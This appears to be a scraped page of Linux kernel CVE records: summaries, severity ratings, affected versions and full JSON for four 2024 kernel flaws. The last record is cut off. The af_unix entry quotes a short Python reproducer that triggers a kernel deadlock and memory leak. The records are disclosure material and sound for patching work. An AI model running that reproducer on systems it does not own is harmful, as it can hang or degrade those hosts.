              "baseScore": 6.5,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "HIGH",
              "integrityImpact": "HIGH",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-25742",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:09:31.331826Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-828",
                "description": "CWE-828 Signal Handler with Functionality that is not Asynchronous-Safe",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-03-27T20:08:11.967Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel before 6.9, an untrusted hypervisor can inject virtual interrupt 29 (#VC) at any point in time and can trigger its handler. This affects AMD SEV-SNP and AMD SEV-ES."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-05-17T21:19:48.853Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "url": "https://www.amd.com/en/resources/product-security/bulletin/amd-sb-3008.html"
        },
        {
          "url": "https://github.com/torvalds/linux/commit/e3ef461af35a8c74f2f4ce6616491ddb355a208f"
        },
        {
          "url": "https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=e3ef461af35a8c74f2f4ce6616491ddb355a208f"
        },
        {
          "url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.9"
        }
      ]
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2024-25742",
    "datePublished": "2024-05-17T21:14:08.723Z",
    "dateReserved": "2024-02-12T00:00:00.000Z",
    "dateUpdated": "2025-03-27T20:08:11.967Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35891 (GCVE-0-2024-35891)

Vulnerability from cvelistv5 – Published: 2024-05-19 08:34 – Updated: 2025-05-04 09:07

Title

net: phy: micrel: Fix potential null pointer dereference

Summary

In the Linux kernel, the following vulnerability has been resolved: net: phy: micrel: Fix potential null pointer dereference In lan8814_get_sig_rx() and lan8814_get_sig_tx() ptp_parse_header() may return NULL as ptp_header due to abnormal packet type or corrupted packet. Fix this bug by adding ptp_header check. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/10608161696c2768f…
	https://git.kernel.org/stable/c/95c1016a2d92c4c28…
	https://git.kernel.org/stable/c/49767b0df276f12e3…
	https://git.kernel.org/stable/c/96c155943a703f065…

Impacted products

Vendor

Product

Version

Linux

Affected: ece19502834d84ece2e056db28257ca2aa6e4d48 , < 10608161696c2768f53426642f78a42bcaaa53e8 (git)
Affected: ece19502834d84ece2e056db28257ca2aa6e4d48 , < 95c1016a2d92c4c28a9d1b6d09859c00b19c0ea4 (git)
Affected: ece19502834d84ece2e056db28257ca2aa6e4d48 , < 49767b0df276f12e3e7184601e09ee7430e252dc (git)
Affected: ece19502834d84ece2e056db28257ca2aa6e4d48 , < 96c155943a703f0655c0c4cab540f67055960e91 (git)

Linux

Affected: 5.18
Unaffected: 0 , < 5.18 (semver)
Unaffected: 6.1.85 , ≤ 6.1.* (semver)
Unaffected: 6.6.26 , ≤ 6.6.* (semver)
Unaffected: 6.8.5 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35891",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-17T17:38:45.513318Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-17T17:41:32.553Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:48.811Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/10608161696c2768f53426642f78a42bcaaa53e8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/95c1016a2d92c4c28a9d1b6d09859c00b19c0ea4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/49767b0df276f12e3e7184601e09ee7430e252dc"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/96c155943a703f0655c0c4cab540f67055960e91"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/phy/micrel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "10608161696c2768f53426642f78a42bcaaa53e8",
              "status": "affected",
              "version": "ece19502834d84ece2e056db28257ca2aa6e4d48",
              "versionType": "git"
            },
            {
              "lessThan": "95c1016a2d92c4c28a9d1b6d09859c00b19c0ea4",
              "status": "affected",
              "version": "ece19502834d84ece2e056db28257ca2aa6e4d48",
              "versionType": "git"
            },
            {
              "lessThan": "49767b0df276f12e3e7184601e09ee7430e252dc",
              "status": "affected",
              "version": "ece19502834d84ece2e056db28257ca2aa6e4d48",
              "versionType": "git"
            },
            {
              "lessThan": "96c155943a703f0655c0c4cab540f67055960e91",
              "status": "affected",
              "version": "ece19502834d84ece2e056db28257ca2aa6e4d48",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "drivers/net/phy/micrel.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.18"
            },
            {
              "lessThan": "5.18",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.85",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.26",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.5",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.85",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.26",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.5",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.18",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet: phy: micrel: Fix potential null pointer dereference\n\nIn lan8814_get_sig_rx() and lan8814_get_sig_tx() ptp_parse_header() may\nreturn NULL as ptp_header due to abnormal packet type or corrupted packet.\nFix this bug by adding ptp_header check.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:07:43.844Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/10608161696c2768f53426642f78a42bcaaa53e8"
        },
        {
          "url": "https://git.kernel.org/stable/c/95c1016a2d92c4c28a9d1b6d09859c00b19c0ea4"
        },
        {
          "url": "https://git.kernel.org/stable/c/49767b0df276f12e3e7184601e09ee7430e252dc"
        },
        {
          "url": "https://git.kernel.org/stable/c/96c155943a703f0655c0c4cab540f67055960e91"
        }
      ],
      "title": "net: phy: micrel: Fix potential null pointer dereference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35891",
    "datePublished": "2024-05-19T08:34:46.998Z",
    "dateReserved": "2024-05-17T13:50:33.113Z",
    "dateUpdated": "2025-05-04T09:07:43.844Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35970 (GCVE-0-2024-35970)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2025-05-04 09:09

Title

af_unix: Clear stale u->oob_skb.

Summary

In the Linux kernel, the following vulnerability has been resolved: af_unix: Clear stale u->oob_skb. syzkaller started to report deadlock of unix_gc_lock after commit 4090fa373f0e ("af_unix: Replace garbage collection algorithm."), but it just uncovers the bug that has been there since commit 314001f0bf92 ("af_unix: Add OOB support"). The repro basically does the following. from socket import * from array import array c1, c2 = socketpair(AF_UNIX, SOCK_STREAM) c1.sendmsg([b'a'], [(SOL_SOCKET, SCM_RIGHTS, array("i", [c2.fileno()]))], MSG_OOB) c2.recv(1) # blocked as no normal data in recv queue c2.close() # done async and unblock recv() c1.close() # done async and trigger GC A socket sends its file descriptor to itself as OOB data and tries to receive normal data, but finally recv() fails due to async close(). The problem here is wrong handling of OOB skb in manage_oob(). When recvmsg() is called without MSG_OOB, manage_oob() is called to check if the peeked skb is OOB skb. In such a case, manage_oob() pops it out of the receive queue but does not clear unix_sock(sk)->oob_skb. This is wrong in terms of uAPI. Let's say we send "hello" with MSG_OOB, and "world" without MSG_OOB. The 'o' is handled as OOB data. When recv() is called twice without MSG_OOB, the OOB data should be lost. >>> from socket import * >>> c1, c2 = socketpair(AF_UNIX, SOCK_STREAM, 0) >>> c1.send(b'hello', MSG_OOB) # 'o' is OOB data 5 >>> c1.send(b'world') 5 >>> c2.recv(5) # OOB data is not received b'hell' >>> c2.recv(5) # OOB date is skipped b'world' >>> c2.recv(5, MSG_OOB) # This should return an error b'o' In the same situation, TCP actually returns -EINVAL for the last recv(). Also, if we do not clear unix_sk(sk)->oob_skb, unix_poll() always set EPOLLPRI even though the data has passed through by previous recv(). To avoid these issues, we must clear unix_sk(sk)->oob_skb when dequeuing it from recv queue. The reason why the old GC did not trigger the deadlock is because the old GC relied on the receive queue to detect the loop. When it is triggered, the socket with OOB data is marked as GC candidate because file refcount == inflight count (1). However, after traversing all inflight sockets, the socket still has a positive inflight count (1), thus the socket is excluded from candidates. Then, the old GC lose the chance to garbage-collect the socket. With the old GC, the repro continues to create true garbage that will never be freed nor detected by kmemleak as it's linked to the global inflight list. That's why we couldn't even notice the issue.

Severity ?

6.3 (Medium)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b4bc99d04c689b565…
	https://git.kernel.org/stable/c/84a352b7eba1142a9…
	https://git.kernel.org/stable/c/601a89ea24d05089d…
	https://git.kernel.org/stable/c/698a95ade1a00e649…
	https://git.kernel.org/stable/c/b46f4eaa4f0ec3890…

Impacted products

Vendor

Product

Version

Linux

Affected: 314001f0bf927015e459c9d387d62a231fe93af3 , < b4bc99d04c689b5652665394ae8d3e02fb754153 (git)
Affected: 314001f0bf927015e459c9d387d62a231fe93af3 , < 84a352b7eba1142a95441380058985ff19f25ec9 (git)
Affected: 314001f0bf927015e459c9d387d62a231fe93af3 , < 601a89ea24d05089debfa2dc896ea9f5937ac7a6 (git)
Affected: 314001f0bf927015e459c9d387d62a231fe93af3 , < 698a95ade1a00e6494482046902b986dfffd1caf (git)
Affected: 314001f0bf927015e459c9d387d62a231fe93af3 , < b46f4eaa4f0ec38909fb0072eea3aeddb32f954e (git)

Linux

Affected: 5.15
Unaffected: 0 , < 5.15 (semver)
Unaffected: 5.15.156 , ≤ 5.15.* (semver)
Unaffected: 6.1.87 , ≤ 6.1.* (semver)
Unaffected: 6.6.28 , ≤ 6.6.* (semver)
Unaffected: 6.8.7 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "NETWORK",
              "availabilityImpact": "LOW",
              "baseScore": 6.3,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "LOW",
              "integrityImpact": "LOW",
              "privilegesRequired": "LOW",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-35970",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-20T14:23:05.468197Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "description": "CWE-noinfo Not enough information",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-01T18:47:14.276Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.053Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b4bc99d04c689b5652665394ae8d3e02fb754153"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/84a352b7eba1142a95441380058985ff19f25ec9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/601a89ea24d05089debfa2dc896ea9f5937ac7a6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/698a95ade1a00e6494482046902b986dfffd1caf"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/b46f4eaa4f0ec38909fb0072eea3aeddb32f954e"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "net/unix/af_unix.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "b4bc99d04c689b5652665394ae8d3e02fb754153",
              "status": "affected",
              "version": "314001f0bf927015e459c9d387d62a231fe93af3",
              "versionType": "git"
            },
            {
              "lessThan": "84a352b7eba1142a95441380058985ff19f25ec9",
              "status": "affected",
              "version": "314001f0bf927015e459c9d387d62a231fe93af3",
              "versionType": "git"
            },
            {
              "lessThan": "601a89ea24d05089debfa2dc896ea9f5937ac7a6",
              "status": "affected",
              "version": "314001f0bf927015e459c9d387d62a231fe93af3",
              "versionType": "git"
            },
            {
              "lessThan": "698a95ade1a00e6494482046902b986dfffd1caf",
              "status": "affected",
              "version": "314001f0bf927015e459c9d387d62a231fe93af3",
              "versionType": "git"
            },
            {
              "lessThan": "b46f4eaa4f0ec38909fb0072eea3aeddb32f954e",
              "status": "affected",
              "version": "314001f0bf927015e459c9d387d62a231fe93af3",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "net/unix/af_unix.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.15"
            },
            {
              "lessThan": "5.15",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.156",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.87",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.28",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.7",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.156",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.87",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.28",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.7",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "5.15",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\naf_unix: Clear stale u-\u003eoob_skb.\n\nsyzkaller started to report deadlock of unix_gc_lock after commit\n4090fa373f0e (\"af_unix: Replace garbage collection algorithm.\"), but\nit just uncovers the bug that has been there since commit 314001f0bf92\n(\"af_unix: Add OOB support\").\n\nThe repro basically does the following.\n\n  from socket import *\n  from array import array\n\n  c1, c2 = socketpair(AF_UNIX, SOCK_STREAM)\n  c1.sendmsg([b\u0027a\u0027], [(SOL_SOCKET, SCM_RIGHTS, array(\"i\", [c2.fileno()]))], MSG_OOB)\n  c2.recv(1)  # blocked as no normal data in recv queue\n\n  c2.close()  # done async and unblock recv()\n  c1.close()  # done async and trigger GC\n\nA socket sends its file descriptor to itself as OOB data and tries to\nreceive normal data, but finally recv() fails due to async close().\n\nThe problem here is wrong handling of OOB skb in manage_oob().  When\nrecvmsg() is called without MSG_OOB, manage_oob() is called to check\nif the peeked skb is OOB skb.  In such a case, manage_oob() pops it\nout of the receive queue but does not clear unix_sock(sk)-\u003eoob_skb.\nThis is wrong in terms of uAPI.\n\nLet\u0027s say we send \"hello\" with MSG_OOB, and \"world\" without MSG_OOB.\nThe \u0027o\u0027 is handled as OOB data.  When recv() is called twice without\nMSG_OOB, the OOB data should be lost.\n\n  \u003e\u003e\u003e from socket import *\n  \u003e\u003e\u003e c1, c2 = socketpair(AF_UNIX, SOCK_STREAM, 0)\n  \u003e\u003e\u003e c1.send(b\u0027hello\u0027, MSG_OOB)  # \u0027o\u0027 is OOB data\n  5\n  \u003e\u003e\u003e c1.send(b\u0027world\u0027)\n  5\n  \u003e\u003e\u003e c2.recv(5)  # OOB data is not received\n  b\u0027hell\u0027\n  \u003e\u003e\u003e c2.recv(5)  # OOB date is skipped\n  b\u0027world\u0027\n  \u003e\u003e\u003e c2.recv(5, MSG_OOB)  # This should return an error\n  b\u0027o\u0027\n\nIn the same situation, TCP actually returns -EINVAL for the last\nrecv().\n\nAlso, if we do not clear unix_sk(sk)-\u003eoob_skb, unix_poll() always set\nEPOLLPRI even though the data has passed through by previous recv().\n\nTo avoid these issues, we must clear unix_sk(sk)-\u003eoob_skb when dequeuing\nit from recv queue.\n\nThe reason why the old GC did not trigger the deadlock is because the\nold GC relied on the receive queue to detect the loop.\n\nWhen it is triggered, the socket with OOB data is marked as GC candidate\nbecause file refcount == inflight count (1).  However, after traversing\nall inflight sockets, the socket still has a positive inflight count (1),\nthus the socket is excluded from candidates.  Then, the old GC lose the\nchance to garbage-collect the socket.\n\nWith the old GC, the repro continues to create true garbage that will\nnever be freed nor detected by kmemleak as it\u0027s linked to the global\ninflight list.  That\u0027s why we couldn\u0027t even notice the issue."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:09:29.452Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/b4bc99d04c689b5652665394ae8d3e02fb754153"
        },
        {
          "url": "https://git.kernel.org/stable/c/84a352b7eba1142a95441380058985ff19f25ec9"
        },
        {
          "url": "https://git.kernel.org/stable/c/601a89ea24d05089debfa2dc896ea9f5937ac7a6"
        },
        {
          "url": "https://git.kernel.org/stable/c/698a95ade1a00e6494482046902b986dfffd1caf"
        },
        {
          "url": "https://git.kernel.org/stable/c/b46f4eaa4f0ec38909fb0072eea3aeddb32f954e"
        }
      ],
      "title": "af_unix: Clear stale u-\u003eoob_skb.",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35970",
    "datePublished": "2024-05-20T09:41:58.524Z",
    "dateReserved": "2024-05-17T13:50:33.141Z",
    "dateUpdated": "2025-05-04T09:09:29.452Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-26840 (GCVE-0-2024-26840)

Vulnerability from cvelistv5 – Published: 2024-04-17 10:10 – Updated: 2025-05-04 08:57

Title

cachefiles: fix memory leak in cachefiles_add_cache()

Summary

In the Linux kernel, the following vulnerability has been resolved: cachefiles: fix memory leak in cachefiles_add_cache() The following memory leak was reported after unbinding /dev/cachefiles: ================================================================== unreferenced object 0xffff9b674176e3c0 (size 192): comm "cachefilesd2", pid 680, jiffies 4294881224 hex dump (first 32 bytes): 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ backtrace (crc ea38a44b): [<ffffffff8eb8a1a5>] kmem_cache_alloc+0x2d5/0x370 [<ffffffff8e917f86>] prepare_creds+0x26/0x2e0 [<ffffffffc002eeef>] cachefiles_determine_cache_security+0x1f/0x120 [<ffffffffc00243ec>] cachefiles_add_cache+0x13c/0x3a0 [<ffffffffc0025216>] cachefiles_daemon_write+0x146/0x1c0 [<ffffffff8ebc4a3b>] vfs_write+0xcb/0x520 [<ffffffff8ebc5069>] ksys_write+0x69/0xf0 [<ffffffff8f6d4662>] do_syscall_64+0x72/0x140 [<ffffffff8f8000aa>] entry_SYSCALL_64_after_hwframe+0x6e/0x76 ================================================================== Put the reference count of cache_cred in cachefiles_daemon_unbind() to fix the problem. And also put cache_cred in cachefiles_add_cache() error branch to avoid memory leaks.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/cb5466783793e6627…
	https://git.kernel.org/stable/c/037d5a949b0455540…
	https://git.kernel.org/stable/c/43eccc5823732ba6d…
	https://git.kernel.org/stable/c/94965be37add09836…
	https://git.kernel.org/stable/c/8b218e2f0a27a9f09…
	https://git.kernel.org/stable/c/38e921616320d1593…
	https://git.kernel.org/stable/c/9cac69912052a4def…
	https://git.kernel.org/stable/c/e21a2f17566cbd649…

Impacted products

Vendor

Product

Version

Linux

Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < cb5466783793e66272624cf71925ae1d1ba32083 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 037d5a949b0455540ef9aab34c10ddf54b65d285 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 43eccc5823732ba6daab2511ed32dfc545a666d8 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 94965be37add0983672e48ecb33cdbda92b62579 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 8b218e2f0a27a9f09428b1847b4580640b9d1e58 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 38e921616320d159336b0ffadb09e9fb4945c7c3 (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < 9cac69912052a4def571fedf1cb9bb4ec590e25a (git)
Affected: 9ae326a69004dea8af2dae4fde58de27db700a8d , < e21a2f17566cbd64926fb8f16323972f7a064444 (git)

Linux

Affected: 2.6.30
Unaffected: 0 , < 2.6.30 (semver)
Unaffected: 4.19.309 , ≤ 4.19.* (semver)
Unaffected: 5.4.271 , ≤ 5.4.* (semver)
Unaffected: 5.10.212 , ≤ 5.10.* (semver)
Unaffected: 5.15.151 , ≤ 5.15.* (semver)
Unaffected: 6.1.80 , ≤ 6.1.* (semver)
Unaffected: 6.6.19 , ≤ 6.6.* (semver)
Unaffected: 6.7.7 , ≤ 6.7.* (semver)
Unaffected: 6.8 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-26840",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-05-28T19:58:24.475717Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-06-04T17:49:17.204Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T00:14:13.702Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/cb5466783793e66272624cf71925ae1d1ba32083"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/037d5a949b0455540ef9aab34c10ddf54b65d285"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/43eccc5823732ba6daab2511ed32dfc545a666d8"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/94965be37add0983672e48ecb33cdbda92b62579"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/8b218e2f0a27a9f09428b1847b4580640b9d1e58"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/38e921616320d159336b0ffadb09e9fb4945c7c3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9cac69912052a4def571fedf1cb9bb4ec590e25a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/e21a2f17566cbd64926fb8f16323972f7a064444"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/cachefiles/cache.c",
            "fs/cachefiles/daemon.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
